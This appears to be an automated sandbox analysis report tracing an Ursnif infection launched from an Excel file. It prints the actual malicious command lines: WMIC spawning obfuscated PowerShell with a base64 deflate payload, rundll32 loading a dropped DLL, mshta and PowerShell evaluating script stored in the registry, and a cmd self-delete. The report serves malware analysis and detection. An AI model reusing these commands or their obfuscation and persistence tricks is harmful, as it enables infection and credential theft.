Dec 9, 2019 17:32:11.366893053 CET	216.58.201.101	443	192.168.2.2	49233	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3776 Parent PID: 548

General

Start time:	17:30:01
Start date:	09/12/2019
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x2f170000
File size:	20392608 bytes
MD5 hash:	716335EDBB91DA84FC102425BFDA957E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 3896 Parent PID: 3776

General

Start time:	17:30:10
Start date:	09/12/2019
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wMic 'pRocess' Call 'creaTE' 'poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( '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')'\'+ ([ChAr]44).TOStrINg()+ '\'[SYSTEm.IO.comPression.coMPRESsIoNMODe]::DecOMpreSs)) '\'+([ChAr]44).TOStrINg()+ '\'[SYsTEm.Text.ENcOdING]::AscII) ).rEAdToeNd( )'\'\|.( $PShoMe[21]+$Pshome[30]+'X')'
Imagebase:	0x530000
File size:	395776 bytes
MD5 hash:	A03CF3838775E0801A0894C8BACD2E56
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.2070939440.000CF000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.2072821354.000DC000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.2073703270.00070000.00000004.00000020.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.2073869879.00270000.00000004.00000040.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.2073914205.011BD000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.2073902999.004B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.2073755839.000DD000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000003.2072909615.014E2000.00000004.00000040.sdmp, Author: Florian Roth
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 3940 Parent PID: 1808

General

Start time:	17:30:10
Start date:	09/12/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	poWersHEll -wiN 01 -ExECUTi BypAsS -nOninTERa -nop '\'& ( `$PSHoME[21]+`$PSHOMe[30]+'X')(nEw-ObJECT Io.sTReamreader( ( nEw-ObJECT sYsTem.Io.comPrESSIOn.DeflAtesTREAm([Io.MeMoRYStreaM][CoNVERt]::froMbASe64STRInG( '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')'\'+ ([ChAr]44).TOStrINg()+ '\'[SYSTEm.IO.comPression.coMPRESsIoNMODe]::DecOMpreSs)) '\'+([ChAr]44).TOStrINg()+ '\'[SYsTEm.Text.ENcOdING]::AscII) ).rEAdToeNd( )'\'\|.( $PShoMe[21]+$Pshome[30]+'X')
Imagebase:	0x228b0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 4036 Parent PID: 3940

General

Start time:	17:30:12
Start date:	09/12/2019
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\PING.EXE' update.microsoft.com
Imagebase:	0xc0000
File size:	15360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2248 Parent PID: 3940

General

Start time:	17:31:00
Start date:	09/12/2019
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user~1\AppData\Local\Temp\W. DllRegisterServer
Imagebase:	0x710000
File size:	45056 bytes
MD5 hash:	C648901695E275C8F2AD04B687A68CE2
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 2596 Parent PID: 548

General

Start time:	17:31:30
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x13d0000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2692 Parent PID: 2596

General

Start time:	17:31:30
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2596 CREDAT:275457 /prefetch:2
Imagebase:	0x13d0000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ssvagent.exe PID: 2624 Parent PID: 2692

General

Start time:	17:31:31
Start date:	09/12/2019
Path:	C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Imagebase:	0x1250000
File size:	53312 bytes
MD5 hash:	0953A0264879FD1E655B75B63B9083B7
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3092 Parent PID: 548

General

Start time:	17:32:13
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x13d0000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3124 Parent PID: 3092

General

Start time:	17:32:14
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3092 CREDAT:275457 /prefetch:2
Imagebase:	0x13d0000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2812 Parent PID: 548

General

Start time:	17:32:16
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x330000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 3052 Parent PID: 2812

General

Start time:	17:32:16
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2812 CREDAT:275457 /prefetch:2
Imagebase:	0x330000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mshta.exe PID: 3584 Parent PID: 1432

General

Start time:	17:32:19
Start date:	09/12/2019
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6\\DtshsPub'));if(!window.flag)close()</script>'
Imagebase:	0x13a0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 3392 Parent PID: 3584

General

Start time:	17:32:20
Start date:	09/12/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:Software\AppDataLow\Software\Microsoft\DCB842AC-8BFE-6E42-F5D0-EF82F90493D6').crypmgmt))
Imagebase:	0x227c0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: csc.exe PID: 3364 Parent PID: 3392

General

Start time:	17:32:24
Start date:	09/12/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ygdsonvv.cmdline'
Imagebase:	0x400000
File size:	77960 bytes
MD5 hash:	0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: iexplore.exe PID: 3684 Parent PID: 548

General

Start time:	17:32:24
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x1060000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 3856 Parent PID: 3684

General

Start time:	17:32:27
Start date:	09/12/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3684 CREDAT:275457 /prefetch:2
Imagebase:	0x1060000
File size:	815312 bytes
MD5 hash:	CA1F703CD665867E8132D2946FB55750
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 3928 Parent PID: 3364

General

Start time:	17:32:29
Start date:	09/12/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES74FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC7436.tmp'
Imagebase:	0x400000
File size:	32912 bytes
MD5 hash:	200FC355F85ECD4DB77FB3CAB2D01364
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 268 Parent PID: 3392

General

Start time:	17:32:35
Start date:	09/12/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0kgxdqm.cmdline'
Imagebase:	0x400000
File size:	77960 bytes
MD5 hash:	0A1C81BDCB030222A0B0A652B2C89D8D
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 2016 Parent PID: 268

General

Start time:	17:32:36
Start date:	09/12/2019
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES9007.tmp' 'c:\Users\user\AppData\Local\Temp\CSC9006.tmp'
Imagebase:	0x400000
File size:	32912 bytes
MD5 hash:	200FC355F85ECD4DB77FB3CAB2D01364
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 1432 Parent PID: 3392

General

Start time:	17:32:38
Start date:	09/12/2019
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xc0000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 412 Parent PID: 1432

General

Start time:	17:32:39
Start date:	09/12/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\AppData\Local\Temp\W'
Imagebase:	0x4a230000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
